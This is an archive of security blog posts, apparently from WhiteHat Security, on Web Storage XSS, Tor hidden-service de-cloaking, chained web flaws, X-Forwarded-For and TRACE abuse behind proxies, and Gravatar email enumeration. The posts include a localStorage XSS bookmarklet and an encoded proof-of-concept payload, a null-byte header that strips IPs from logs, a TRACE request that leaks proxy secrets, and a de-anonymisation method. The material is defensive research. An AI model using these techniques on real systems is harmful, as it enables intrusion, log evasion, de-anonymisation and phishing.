Category Archives: Technical Insight

Web Storage Security

The web waits for no one, not even W3C.

While the HTML5 specification isn’t finalized, and HTML5 Storage has even been broken out into its own Web Storage Specification, which is even further from being finalized, code continues to move to the client, and more developers are using (and misusing) the next-generation features that are already available in browsers. Engineers and researchers in the WhiteHat Security Threat Research Center are in a unique position to know that “where there is code, there are vulnerabilities,” and JavaScript is certainly no exception.

Over the past few months, the Threat Research Center has added new checks to WhiteHat Sentinel to better identify and analyze the usage of Web Storage and its potential security impact. During the course of this research, I analyzed over 600 applications that made at least one call to Web Storage (“getItem” or “setItem”). The preliminary results may surprise you. They sure surprised me.

Before I jump into the vulnerability discussion, a brief word about some of the so-called “security advice” concerning HTML5 APIs and specifically Web Storage. I’ll be the first to admit that before this project I’d never used the Web Storage APIs; this was a from-scratch effort. Like any good developer (or hacker) learning a new technology, I googled “Web Storage Security”, “localStorage Security”, and “HTML5 Storage Security”. The results were somewhat discouraging.  I couldn’t find a single vulnerable code example and most security commentaries boiled down to either “there is no major risk” or “if developers use Web Storage properly there is no risk.”

The argument is that because stored values aren’t transmitted over HTTP we actually have a more secure option for storing data that is only needed on the client. In my opinion, this is just flat out wrong.  Arguing that “if developers use it correctly there is no risk” is like saying “if PHP developers use $_GET correctly there won’t be any problems.” We all know how that turns out.

So I knew I needed to go to the source. Section 7 of the Web Storage Specification is titled “Security”; certainly we can get some good advice here. Honestly though, I found section 7.1’s warning about DNS spoofing attacks and 7.2’s warning about cross-directory attacks to be a bit hollow. I’m not saying these attacks don’t exist, but certainly we can give some better advice than “Use TLS” and “Don’t implement on shared domains”. Section 7.3, on implementation risks, appears to be entirely targeted at browser makers. If developers can’t go to W3C for advice on how and how not to use Web Storage securely, then where can they go? It looks like we are back to Stack Overflow and random blog posts. With that being the state of security advice on Web Storage, I figured I’d throw my hat in the ring.

Examples of Vulnerability:

Evil Roommate / Public Computer

Firefox’s about:home page is vulnerable to DOM (document object model) XSS via localStorage injection through the snippets functionality. While I can’t send you a link or build a malicious website to exploit this issue, I’m willing to bet that thousands of people use Firefox on a shared or public computer every day. It sure would be nice to be able to log all of those keystrokes even after the browser is closed and private data has been cleared.

Just sit down and run a weaponized version of the following bookmarklet:

javascript:window.localStorage.setItem('snippets','<iframe src="https://www.whitehatsec.com" onload="prompt()" style="width:100%;height:100%;z-index:9999999;position:absolute;left:0px;top:0px;"/>');

When contacted about the above issue via email the Mozilla security team advised that they are migrating the functionality off of localStorage for reasons other than security. Even so, I’ll be keeping my Firefox usage to my own computer that is always locked whenever I am not using it. At least until this functionality is patched.

DOMXSS -> localStorage XSS -> The persistent vector your server will never see.

Vulnerable Code:

<script language="JavaScript">
// Id comes straight from the URL; persistId comes straight from localStorage.
var Id = getPramValue("id");
var persistId = localStorage.getItem('id');
if( isValid(Id) ){
  // Sink: Id is concatenated into markup without encoding.
  document.write('<a href="http://www.example.com/?s=13436&id=' + Id + '" id="store_locator">');
  document.write('<div>Find Store</div>');
  document.write('</a>');
} else if( localStorage && isValid(persistId)) {
  // Sink: the stored value is concatenated into markup without encoding.
  document.write('<a href="http://www.example.com/?s=13436&id=' + persistId + '" id="store_locator">');
  document.write('<div>Find Store</div>');
  document.write('</a>');
} else {
  document.write('<a href="http://www.example.com/locator" class="scroll linktomap" id="store_locator">');
  document.write('<div>Find Store</div>');
  document.write('</a>');
}
</script>

Proof of Concept:

<a href="http://www.example.com/#?id='"><img/src="x"onerror=eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41))>

The String.fromCharCode here just makes it easier to insert the needed injection into localStorage without excessive quote escaping. Here is what it decodes to:

window.localStorage.setItem('id','"><img/src=\"x\"onerror=alert(1)>')
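To check the decoding yourself, the character codes can be turned back into a string in any JavaScript console. The sketch below copies the codes from the proof of concept; the helper name toCharCodes is hypothetical and only shows how such a payload could be encoded in the first place.

```javascript
// Character codes copied verbatim from the proof of concept above.
const codes = [119,105,110,100,111,119,46,108,111,99,97,108,83,116,111,114,97,103,101,46,115,101,116,73,116,101,109,40,39,105,100,39,44,39,34,62,60,105,109,103,47,115,114,99,61,92,34,120,92,34,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62,39,41];

// Decode: String.fromCharCode maps each number to one UTF-16 code unit.
const decoded = String.fromCharCode(...codes);
console.log(decoded);

// Hypothetical helper for the reverse direction (ASCII input assumed).
function toCharCodes(text) {
  return Array.from(text, (ch) => ch.charCodeAt(0));
}
```

Because the payload is passed around as numbers, it contains no quote characters that would need escaping inside the href attribute.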

The Always and Never of Web Storage

ALWAYS:

Always validate, encode, and escape user input before placing it into localStorage or sessionStorage.

Always validate, encode, and escape data read from localStorage or sessionStorage before writing it onto the page (DOM).

Always treat all data read from localStorage or sessionStorage as untrusted user input.

NEVER:

Never store sensitive data using Web Storage: Web Storage is not secure storage. It is not “more secure” than cookies because it isn’t transmitted over the wire. It is not encrypted. There is no Secure or HttpOnly flag, so this is not a place to keep session or other security tokens.

Never use Web Storage data for access control decisions or trust the serialized objects you store here for other critical business logic. A malicious user is free to modify their localStorage and sessionStorage values at any time; treat all Web Storage data as untrusted.

Never write stored data to the page (DOM) with a vulnerable JavaScript or library sink. Here is the best list of JavaScript sinks that I am aware of on the web right now. While it is true that a perfect storm of tainted data flow must exist for a remote exploit that relies 100% on Web Storage, you must consider two alternate scenarios. First, consider the evil roommate, unlocked, unattended, or public computer scenario, in which a malicious user has temporary physical access to your user’s web browser. The computer’s owner may have prevented a low-privileged user from installing a malicious add-on, but I’ve never seen a user prevented from making a bookmark. Second, don’t ignore the possibility of improper Web Storage usage allowing escalation of another vulnerability, such as reflective cross-site scripting into persistent cross-site scripting.
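As a rough illustration of the ALWAYS and NEVER rules applied to the store locator example, here is a minimal sketch. It assumes store IDs are short numeric strings (the pattern is my assumption, not something the original application documents), and the function names escapeHtml and storeLocatorHref are hypothetical.

```javascript
// Assumption: a legitimate store ID is 1 to 10 digits. Adjust to the real format.
const STORE_ID_PATTERN = /^[0-9]{1,10}$/;
const FALLBACK_HREF = "http://www.example.com/locator";

// Encode the characters that are significant in HTML text and attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Treat the ID as untrusted whether it came from the URL or from Web Storage.
function storeLocatorHref(untrustedId) {
  if (typeof untrustedId !== "string" || !STORE_ID_PATTERN.test(untrustedId)) {
    return FALLBACK_HREF;
  }
  return "http://www.example.com/?s=13436&id=" + encodeURIComponent(untrustedId);
}

// In a browser, prefer DOM APIs over document.write (not executed here):
//   const link = document.createElement("a");
//   link.href = storeLocatorHref(localStorage.getItem("id"));
//   link.textContent = "Find Store";
```

The allow-list check does most of the work here; escapeHtml is included for cases where a stored value really must be placed into markup as text.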

“How does WhiteHat Security approach BYOD?”

BYOD is a big topic for companies, particularly when it comes to how to properly implement policy around personal devices used for work purposes. It’s a question that we are asked often by employees and by our customers, so I thought I would take a moment to share a little about our approach to BYOD.

By nature, the work we do at WhiteHat Security involves some of our customers’ most sensitive data and critical assets. We don’t take this lightly. So, we deal with BYOD perhaps a little differently than most companies. Access to sensitive customer data is granted only via WhiteHat Security supported hardware and according to job function. So in a sense, we do not provide outright support for BYOD. If employees or guests do bring their own devices to our offices, they can only access our public wifi, and no WhiteHat Security data or customer data is accessible on that network. We segment our data pretty aggressively to prevent data leakage. For employees who require certain mobile devices (smartphones or laptops, for instance), WhiteHat Security will pay for the device and the IT department will configure it for access, but that access is limited to email and does not include customer data.

Tor Hidden-Service Passive De-Cloaking

Someone recently asked me if I knew how to find where Tor-hidden services were really hosted. I identified a few possible methods for finding the origin servers, but none of them worked universally – or even in most situations. Eventually, I did find one way to definitively locate an origin server. However, that method is not trivial – and is still just theoretical.

First, I found the following entry on Tor’s webpage: “If your computer isn’t online all the time, your hidden service won’t be either. This leaks information to an observant adversary.” The following idea then came to mind: Let’s say you have a small army of bots (probably a dozen or so are necessary for the sake of redundancy; basically, the more bots you use, the better) connected to Tor. You’d then need to feed something – like the Internet Health Report – into a central database that the de-cloaking bots can monitor.

Because the Internet can be flaky and regularly has minor outages – sometimes related to routing, and sometimes related to a simple lack of power – it’s easy (if you have time) to determine if an outage is the cause of a problem, even on robust cloud infrastructures. Furthermore, some companies (e.g., Keynote) already specialize in tracking outages for you.

De-Cloaking

De-cloaking begins with a few of your robots doing regular polling to make sure your service remains online. This polling is essential for performing tests. When you do discover an outage on the Internet, you should immediately have your robots – from Tor nodes around the world – attempt to contact the server in question. If just a few of the bots are blocked, it’s likely that they are either just transiting the “broken” network or that the bot is itself on this “broken” network.

However, if none of your bots can reach the service in question, there’s a good chance that you’ve found the part of the Internet that’s currently broken. One caveat is that if all of the Introducer nodes lie beyond the path of the disruption it may give a false positive, but this is unlikely unless the outage is extremely close to where the polling robots are, or the outage is extremely large. So false positives are a real possibility, although not enough of a deterrent to make this attack unviable.

This same “contact the server in question” technique can reveal smaller, more granular breakages by monitoring for outages within a specific network, then down to the data center, and possibly even down to the subnet. At the subnet level you’re monitoring a small enough set of machines that one could – at least theoretically – cause selective minor outages (even a few seconds could do the trick) by using a wide variety of denial-of-service attacks, in order to find the one machine that, when attacked, makes the site you are monitoring unresponsive to your bots at exactly the same time.
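The bookkeeping behind this correlation is simple enough to sketch. The example below assumes each observation records a network label and whether any bot could still reach the service during that network’s outage; the field names and the function rankCandidateNetworks are hypothetical, and the attack itself remains theoretical.

```javascript
// Each observation pairs one known outage with what the polling bots saw.
//   network: label for the network that had the outage (hypothetical naming)
//   serviceReachable: true if any bot could still reach the hidden service
function rankCandidateNetworks(observations) {
  const tally = new Map();
  for (const { network, serviceReachable } of observations) {
    const entry = tally.get(network) || { outages: 0, serviceDown: 0 };
    entry.outages += 1;
    if (!serviceReachable) entry.serviceDown += 1;
    tally.set(network, entry);
  }
  // Rank by the fraction of outages that coincided with the service being down,
  // breaking ties in favor of networks with more observed outages.
  return [...tally.entries()]
    .map(([network, { outages, serviceDown }]) => ({
      network,
      outages,
      serviceDown,
      ratio: serviceDown / outages,
    }))
    .sort((a, b) => b.ratio - a.ratio || b.outages - a.outages);
}
```

A network whose outages always coincide with the service going dark floats to the top; a single coincidence proves little, which is why repeated observations matter.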

Alternatively, if the IP range is small enough, a government agency could simply watch the wire for Tor traffic. That method is painstaking, requires physical interception, and may require a lot of traffic analysis. Still, it could work.

Theoretically, you also could speed up the de-cloaking by looking at the date stamp in the HTTP response of the hidden service. If that service is listening on port 80, you could simply check the dates and then ignore the ones that fail to match the correct time zone/clock skew. Then, unless the problem is deliberate tampering, you’d almost certainly – and much more quickly – know what’s causing the outages. That is, unless the hidden services are within a VM that fails to use NTP (network time protocol), while the parent does use NTP, or unless both dates were set by hand.

Overall, using a time-stamp to improve de-cloaking is risky, because it could also be a ‘red herring’ – a tricky method used by a hidden Tor service administrator to hide the service further. A similar technique has been discussed before using clock skews of each Tor node and validating that it matches the Tor hidden service to find the origin server. But using clock skews or time-stamps assumes that the hidden service is not within a VM on the host machine, which is a real possibility; therefore, this may not always work.
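For a sense of what “checking the dates” involves, here is a minimal sketch that estimates clock skew from an HTTP Date header. The function name clockSkewSeconds is hypothetical, and the sketch ignores network latency, which adds noise to any real measurement.

```javascript
// Returns server time minus local receive time, in whole seconds,
// or null if the Date header cannot be parsed.
function clockSkewSeconds(dateHeader, receivedAtMs) {
  const serverMs = Date.parse(dateHeader);
  if (Number.isNaN(serverMs)) return null;
  return Math.round((serverMs - receivedAtMs) / 1000);
}

// Example: a response stamped two seconds ahead of the local clock.
const receivedAt = Date.UTC(2013, 2, 16, 22, 5, 20); // month index 2 is March
console.log(clockSkewSeconds("Sat, 16 Mar 2013 22:05:22 GMT", receivedAt));
```

The Date header only has one-second resolution, so a single sample is coarse; skew comparisons of this kind usually rely on many samples over time.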

The concept of a Tor hidden service using multiple machines with the same Tor private key to create a “load balancing” effect to thwart this de-cloaking attack has two issues. The first is that apparently in practice the failover effect can take hours, not seconds. The second is that depending on how the data is mirrored between the two hidden services, it may be extremely easy to tell which server you are communicating with. If something like rsync is used instead of NFS to mirror content, the inodes on disk and timestamps will be different, leading to different ETag fingerprints and different Last-Modified time stamps, which can be discerned simply by looking at the HTTP headers.
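Telling the mirrors apart from headers alone could look something like the following sketch. It assumes response headers have already been collected as plain objects with lowercase keys; the function name groupByFingerprint and the sample header values are made up for illustration.

```javascript
// Count how many responses share each (ETag, Last-Modified) pair.
// More than one distinct pair for the same resource hints at more than one backend.
function groupByFingerprint(responses) {
  const groups = new Map();
  for (const headers of responses) {
    const key = `${headers["etag"] || ""}|${headers["last-modified"] || ""}`;
    groups.set(key, (groups.get(key) || 0) + 1);
  }
  return groups;
}

// Illustrative values only.
const seen = groupByFingerprint([
  { "etag": '"1a2b-4d"', "last-modified": "Sat, 16 Mar 2013 10:00:00 GMT" },
  { "etag": '"9f8e-4d"', "last-modified": "Sat, 16 Mar 2013 10:03:41 GMT" },
  { "etag": '"1a2b-4d"', "last-modified": "Sat, 16 Mar 2013 10:00:00 GMT" },
]);
console.log(seen.size); // number of distinct fingerprints observed
```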

Admittedly, what I’m describing here is just a theoretical attack. A large part of this attack is simply passive recon tied in with some generic polling techniques. However, that is a minor barrier for determined adversaries. This is an attack method that could make it significantly more difficult to perfectly hide a Tor-hidden service from a sophisticated adversary using today’s technology without significant forethought or planning.

Therefore, it is probably unwise – without taking additional precautions – to run a Tor-hidden service that relies entirely on IP anonymity for safety.

A huge thanks to Tom Ritter, Runa Sandvik, Tim Tomes and Robert Graham for letting me bounce these thoughts off of them.

Simple Vulnerabilities Aren’t Always Simple

In any given application, vulnerabilities can range from a minor case of Information Leakage to major Insufficient Authorization/Authentication, and anywhere in between.  With such a wide range of vulnerabilities it is easy to see how, say, an issue with Insufficient Anti-Automation can be minor.  However, a malicious attacker will more than likely focus on multiple vulnerabilities; this tactic can exploit seemingly minor vulnerabilities and result in a much more dangerous exploit than the sum of its parts.

A Perfect Example

I recently tested an application and almost immediately discovered an Insufficient Anti-Automation vulnerability.  A profile creation page had a CAPTCHA in place to prevent automated creation of accounts, but I found that the CAPTCHA could be bypassed by repeating the same parameters in the POST request.  We’ll say these were named “CAPTCHA_value” and “CAPTCHA_text.”  This vulnerability is normally rated at a Threat/Severity of Critical/Medium; most would consider this a “minor” vulnerability, especially compared to something like SQL Injection or Insufficient Authentication.

Later, testing the same application, I discovered a place I could land reflective Cross Site Scripting; it was in an obscure, hard-to-reach error page, but it was there.  This is a more severe vulnerability than the Insufficient Anti-Automation vulnerability I previously mentioned, but being reflective it was a less-than-stellar find, somewhat difficult to exploit.

Finally, after several hours of testing, I discovered a way to view, and indeed modify, another user’s profile information.  This is a major find, very dangerous in the hands of a malicious attacker, and it was not difficult to exploit.  This major find could be used to plant the aforementioned Cross Site Scripting vulnerability into a user’s profile; suddenly the vulnerability seemed much more potent.   After a little more testing, I determined that it would actually be possible to iterate through user accounts and, utilizing the previous Insufficient Anti-Automation vulnerability, alter their profile information to include a link to the Cross Site Scripting vulnerability.

This chain of vulnerabilities quickly led to an exploit that could potentially destroy the entire business model of this application: imagine finding out that every single user had been attacked simultaneously, at minimum compromising users’ sensitive data, and potentially removing said data or even compromising their accounts through Cross Site Scripting.  Thus, it is clear that apparently “minor” vulnerabilities can be used in combination with more “dangerous” finds to create a truly devastating attack that could compromise an entire application.  Remember, many instances of Insufficient Anti-Automation are considered minor; nevertheless, by exploiting this particular example the entire application could be compromised.

This is exactly the sort of vulnerability that can only be found through manual assessments; an application or source scanner might have found any of these individually, but could never use the human reasoning required to link the three of them together to form an exploit that is far greater than the sum of its parts. Human beings can assess and assign risk accurately: whether an exploit (such as insufficient anti-automation) is apparently “low risk” or not, the actual risk will vary based on information a human reviewer can bring to this process much more reliably than any automated system.

Checklist To Prepare Yourself In Advance of a DDoS Attack

Many people are discussing the latest attacks that have been causing intermittent outages all over the Internet. Unfortunately, distributed denial of service (DDoS) causes massive congestion; and without something upstream close to the attacking machines in question, it can be very difficult to stop the attack.

One thing I find is that many organizations simply have no idea what to do when they are faced with a denial of service attack (DoS), or with its big bad brother, the distributed denial of service attack (DDoS). So I created a DDoS Runbook that can be used by companies in advance of any attacks to help them organize how they are to deal with the attack if and when it does occur. The last thing you want to do in the midst of a crisis is try to figure out who runs the infrastructure that’s under attack, or be formulating a last-minute crisis management newsletter from scratch.

I highly encourage companies to download it, and make it their own. Modify what makes sense to modify, add or delete what’s missing or doesn’t apply and make sure you have it handy. It’s nice to be able to break glass in case of emergency and have a good plan in place.

Top 3 Proxy Issues That No One Ever Told You

Occasionally I used to get asked to look at web application architecture for companies. Companies that grow above a certain size or threat level often move to using inline caching proxies, inline cloud based WAF solutions (e.g. CloudFlare or Incapsula), or both. For a long time I’ve had a hard time explaining why this could be a problem but I finally ran into a confluence of problems that demonstrate why this is an issue. Let’s start with the major problem.

X-Forwarded-For

When you have a website that needs to use IP addresses, you’ll run into strange situations if you run an inline proxy. The most important issue is that the IP address of the machine connecting to your web server is always that of the upstream proxy/ies and not that of the person connecting. The user connects to the proxy and the proxy connects to your website; therefore, your website always sees the same IP address. IP addresses are used for all kinds of security measures. They’re used for seeding secret strings in cookies in PHP. They’re used for doing flood detection. They’re used for brute force detection and lockouts. IPs are used all the time. But what happens when all the IPs look the same?

To get around that, proxies have invented something called the X-Forwarded-For header, which can look like a lot of random things. It can look like any of the following:

X-Forwarded-For: 192.168.0.5
X-Forwarded-For: 192.168.1.2, 123.123.123.123
X-Forwarded-For: 1.3.3.7
X-Forwarded-For: localhost, 123.123.123.123

Because it’s an optional header, it can contain almost anything. Sometimes those things are real IP addresses (sometimes internal RFC1918 address space and sometimes public) and sometimes it just contains garbage. Either way, most proxies have decided that the X-Forwarded-For header is the best header to use to tack on their information. So they tack the IP address of the user who is connecting to them onto the end of the string that they receive (or create a new string if there isn’t one already) and pass that to the web-server.

The web-server then has to be smart enough to take that information and parse apart the string to grab the last IP address and intelligently replace the IP address of the proxy with the IP address listed in the X-Forwarded-For header. Inline devices that sit behind the proxy have to be just as smart. This leads to all kinds of weird scenarios where an attacker can spoof IP addresses by sending X-Headers after having breached the network, but that is less likely.
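A minimal sketch of that parsing step is below. It handles IPv4 only, assumes a single trusted proxy hop, and falls back to the connecting address whenever the header is missing or malformed; the names isIPv4 and clientIpFromForwardedFor are hypothetical, not part of any particular server or module.

```javascript
// Strict dotted-quad check: four decimal octets, each 0-255, no leading zeros.
function isIPv4(text) {
  const parts = text.split(".");
  return (
    parts.length === 4 &&
    parts.every((p) => /^(0|[1-9][0-9]{0,2})$/.test(p) && Number(p) <= 255)
  );
}

// peerAddress is the address of the socket that connected to the web server.
// The header is honored only when that peer is a proxy we operate ourselves.
function clientIpFromForwardedFor(headerValue, peerAddress, trustedProxies) {
  if (!trustedProxies.includes(peerAddress) || typeof headerValue !== "string") {
    return peerAddress;
  }
  // The trusted proxy appends the address it saw, so take the last entry.
  const entries = headerValue.split(",").map((entry) => entry.trim());
  const last = entries[entries.length - 1];
  return isIPv4(last) ? last : peerAddress;
}
```

Everything to the left of the last entry was supplied by someone else and may be garbage, which is why the sketch never looks at it.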

rpaf

To accomplish this goal of looking at the X-Forwarded-For header, many people turn to rpaf, which performs this task very easily. The problem is that if rpaf doesn’t see the header it doesn’t know what IP address to use, and it will instead default to nothing. So how do we get the inline proxy to send something that rpaf won’t understand? Simple: we use a null byte (here shown as %00 below so you can visualize it, but normally it is not URL encoded):

GET / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
X-Forwarded-For%00: whatever

This will create a 400 error, because Apache doesn’t understand the request. However, the most important thing is what it looks like in the logs. Notice that in the first log entry there is an IP address, and in the second there’s no IP address:

Mar 17 20:05:46 123.123.123.123 - - [17/Mar/2013:20:05:46 +0000] "GET / HTTP/1.1" 200 15 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"

Mar 17 20:06:10 - - - [17/Mar/2013:20:06:10 +0000] "GET / HTTP/1.1" 400 56 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"

An attacker’s mileage may vary depending on how the proxy treats the header with a null byte in it. Still, the proxy may do its own logging, which may render this attack useless. The most dangerous variant would be if an attacker can simply bypass the cloud based WAF solution and go directly to the origin server. By bypassing the WAF the attacker doesn’t have to worry about how the proxy handles the null byte or any extra logging it may perform.
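One defensive check that follows from this is to flag header names that are not valid HTTP tokens before anything downstream relies on them. The sketch below uses the token character set from the HTTP/1.1 message syntax; the function name findMalformedHeaderNames is hypothetical, and it assumes you have access to the raw header names as received.

```javascript
// Header field names must be HTTP "token" characters; a null byte is not one.
const HEADER_NAME_TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

// Returns the names that contain anything outside the token character set.
function findMalformedHeaderNames(names) {
  return names.filter((name) => !HEADER_NAME_TOKEN.test(name));
}

const suspicious = findMalformedHeaderNames([
  "Host",
  "User-Agent",
  "X-Forwarded-For\u0000", // the null-byte variant from the request above
]);
console.log(suspicious.length); // how many names failed the check
```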

400 errors

Why would an attacker intentionally want to send a request that creates a 400 error? There are lots of potential reasons. A few of the fine folks on Twitter suggested the following:

  • Fingerprinting the operating system
  • Filling up the logs
  • Using the user-agent to seed the system logs with a remote file include
  • Using the user-agent to seed the system to create XSS attacks in log parsers
  • Distraction from another attack

There may be many additional reasons that a request that creates a 400 error may be useful, but the point is that as a result there’s no IP address associated with the request in the logs in Apache.

Obfuscation

Sometimes proxies may communicate very sensitive information to the server, so that the server knows that it’s talking to the right thing. These secrets can be just about anything. Let’s say for instance that knowing that secret would allow you to contact the server directly and it would believe you are the proxy. Then let’s say the proxy and the web server decide to use another X header instead of X-Forwarded-For to obfuscate it so that an attacker may not know what the real header is – then the attacker will be unable to spoof another IP address.

Here is where TRACE comes back to haunt us. The HTTP method TRACE comes back once every few years to cause problems, and for some reason it’s still enabled by default more times than not. With TRACE an attacker can see what they sent to the server. But because they are not connecting directly to the server but instead to the proxy, what the attacker really sees is what the proxy is sending to the web server. Here’s what it might look like:

TRACE / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Date: Sat, 16 Mar 2013 22:05:22 GMT
Server: Apache
Content-Type: message/http
X-Secret-info: lkjfalkjsfoij2oif4oijalskdfjsecretstringgoeshere12342134
Obfuscated-Client-Ip: 123.123.123.123
Content-Length: 348

So relatively easily the attacker now knows the secret and the obfuscated header that the web server is using as a replacement for IP addresses. Assuming the web server allows inbound connections from the Internet and the real IP address of the web-server can be found out, the attacker can now communicate to the web-server as if they were another IP address. This is not an ideal scenario. So at an absolute minimum, disabling TRACE is a really important and easy step to take. But doing forensic logging which doesn’t rely on rpaf or other tricks to figure out IP address from alternate HTTP headers is also a good idea.
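If you want to audit your own deployment for this leak, the comparison is mechanical: list the headers you sent, then see which header names show up in the echoed request that you did not send. The sketch below assumes you already have the echoed request as text; the function name headersAddedUpstream is hypothetical.

```javascript
// sentHeaderNames: names of the headers the client actually sent.
// echoedRequestText: the request as echoed back in the TRACE response body.
// Returns header names that appear in the echo but were never sent,
// meaning something between the client and the origin added them.
function headersAddedUpstream(sentHeaderNames, echoedRequestText) {
  const sent = new Set(sentHeaderNames.map((name) => name.toLowerCase()));
  const added = [];
  const lines = echoedRequestText.split(/\r?\n/).slice(1); // skip the request line
  for (const line of lines) {
    if (line === "") break; // blank line ends the header section
    const colon = line.indexOf(":");
    if (colon <= 0) continue; // not a header line
    const name = line.slice(0, colon).trim();
    if (!sent.has(name.toLowerCase())) added.push(name);
  }
  return added;
}
```

Any name this returns is something an outsider could learn the same way, so it should not be treated as a secret.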

Special thanks to @gmanfunky @dan_crowley @ivanristic @dallendoug @cgkades @desi_juggaad and @therealsaumil for the help with uses for 400 errors!

Gravatar Email Enumeration in JavaScript

A friend recently reminded me about a hackers’ trick – based on using Gravatar – that I’d long forgotten about. The method was last discussed on Stack Overflow a couple of years ago. Lately, people have been thinking again about this problem. And although the discussion has mostly been about how to brute force email addresses from a known Gravatar URL, there is a way to perform much more efficient and larger-scale brute force attacks with Gravatar.

The problem

This issue stems from four main factors:

  1. Gravatar uses the MD5 hash of a user’s email address to display the Gravatar image
  2. Gravatar allows website authors to display no image at all if they’d rather not
  3. Because of a minor issue in the browser’s origin policy, there is a way for an attacker to calculate an image size remotely
  4. Companies, and people, often use email addresses closely related to their actual name

The attack

By combining these four factors, I created a small demonstration script that an attacker could embed in their webpage. Given a first name, a last name (and, optionally, a middle initial), and a domain name, a small piece of JavaScript can perform the cracking in the user’s own browser.

So imagine this: In the simplest – and mostly impractical – example, an attacker gets people to visit a site and enter their first and last names, as well as their company’s name (let’s say “Safeway”). The malicious website then programmatically adds “.com” to the end of the company name. Assuming, at least in most cases, that the “.com” successfully produces the correct domain name (in this case, “Safeway.com”), the browser then concatenates the first name, last name, and domain name in various ways. The browser also tries Gmail, Outlook, Hotmail, and AOL, as these are the most common webmail providers.
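The “concatenates in various ways” step might look roughly like this. The specific local-part patterns are my assumptions about common corporate conventions, not the list used in the original demonstration, and the function name candidateEmails is hypothetical. Hashing each candidate with MD5 would be a separate step and is not shown.

```javascript
// Build likely addresses from a name and a list of domains.
function candidateEmails(first, last, domains) {
  const f = first.trim().toLowerCase();
  const l = last.trim().toLowerCase();
  if (!f || !l) return [];
  // Assumed conventions: jane.doe, janedoe, jdoe, janed, jane, doe.jane
  const localParts = [`${f}.${l}`, `${f}${l}`, `${f[0]}${l}`, `${f}${l[0]}`, f, `${l}.${f}`];
  const results = new Set(); // a Set drops duplicates such as repeated domains
  for (const domain of domains) {
    for (const local of localParts) {
      results.add(`${local}@${domain.toLowerCase()}`);
    }
  }
  return [...results];
}

console.log(candidateEmails("Jane", "Doe", ["example.com"]));
```

The same list is useful defensively: it shows how few guesses are needed when addresses follow the owner’s name.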

Once a user’s browser visits the malicious website, the JavaScript forces the browser to pull in images from Gravatar. If an image is invalid, the size of the image in the browser will be less than one pixel in either dimension. However, if the image does exist, its size in the browser will be greater than zero, which confirms for the attacker that the email address is valid. A semi-benign example of this attack could be used during the registration process of a website, in order to speed up the collection of email addresses, and/or by providing a drop-down menu of probable email addresses.

The risks

This simple brute force method can then lead to far more efficient and practical attacks that produce massive amounts of email addresses of the target domain. For instance, let’s say an attacker gathers a dictionary containing thousands of common first names, last names, and the target domain name(s) in question (or the top Alexa 1000 domains, if this is an untargeted campaign). Instead of spamming chosen email addresses arbitrarily, an attacker can run the same JavaScript he’s already written (either on his own or by someone else on his behalf) to collect massive numbers of valid email addresses.

And if the attacker can have a random browser on the Internet do this recon on his behalf, this brute-force attack is performed without the attacker’s own machines sending a single request to Gravatar. This technique also works successfully without requiring a massive spam campaign to identify valid user accounts.

I’ve created an embeddable example here which demonstrates this enumeration.

Once discovered, this is not an easy problem to fix, because so many people and sites use Gravatar, and it would require a forklift upgrade of their code to use something more secure than a simple MD5 hash. Therefore, it is probable that this issue will continue to exist for a long time – certainly as long as Gravatar exists and provides the features it currently offers. The result is the possibility of large-scale spear-phishing campaigns against large corporations. Therefore, WhiteHat’s Threat Research Center recommends that corporations restrict employees from tying Gravatar accounts to their corporate email addresses when conducting company-specific business.

WhiteHat Sentinel Infrastructure, by the Numbers

WhiteHat Sentinel has assessed well over 12,000 websites for vulnerabilities across 500 companies. For context, getting to our first 1,000 websites took four years. Today, we’re onboarding at least 1,000 per month.

The infrastructure’s concurrent scan average is roughly 2,100, with peaks reaching 3,374. Currently, these vulnerability scans generate 256 million HTTP requests per month. This traffic crosses over redundant 1Gb Internet connections and has uncovered nearly 100,000 separate website vulnerabilities between 2006 and 2012. Collectively we index billions of URLs annually. Think Googlebot, but logged-in. To top it off, we log each and every HTTP request/response pair, with full headers, for every scan, on every website.
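To put the monthly figure in more familiar units, here is a quick back-of-the-envelope calculation. It assumes a 30-day month and an even spread of traffic, neither of which is stated above, so treat the results as rough averages only.

```javascript
const requestsPerMonth = 256e6;              // figure quoted above
const secondsPerMonth = 30 * 24 * 60 * 60;   // assumption: 30-day month
const avgConcurrentScans = 2100;             // figure quoted above

// Average request rate across the whole infrastructure.
const avgRequestsPerSecond = requestsPerMonth / secondsPerMonth;

// Average rate per scan, if the load were spread evenly over concurrent scans.
const avgPerScan = avgRequestsPerSecond / avgConcurrentScans;

console.log(avgRequestsPerSecond.toFixed(1)); // a little under 100 per second
console.log(avgPerScan.toFixed(3));           // well under one request per second per scan
```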

As you can see, mass scanning websites for vulnerabilities is highly disk intensive. That’s why Sentinel’s infrastructure has 220TB worth of clustered storage arrays, plus an additional 32TB in virtual shared storage. This storage space is split up among 12 master databases and 12 standby databases (one for each master database for full fault tolerance), and each consumes about 20GB per week. 2TB of new data is being written to the NFS cluster every week.

We also have heavy server requirements. While we recommend Sentinel customers scan their websites continuously to minimize coverage gaps, current schedules are weighted towards commencing Thursday and Friday, extending over the weekend, and pausing or completing by the Monday e-commerce rush. This of course is local time for the customer, and we do provide services for the entire planet! Monday morning is typically when customers analyze their most recent Sentinel vulnerability findings, integrate our results into their bug tracking system, and generate customized reports for the week’s meetings.

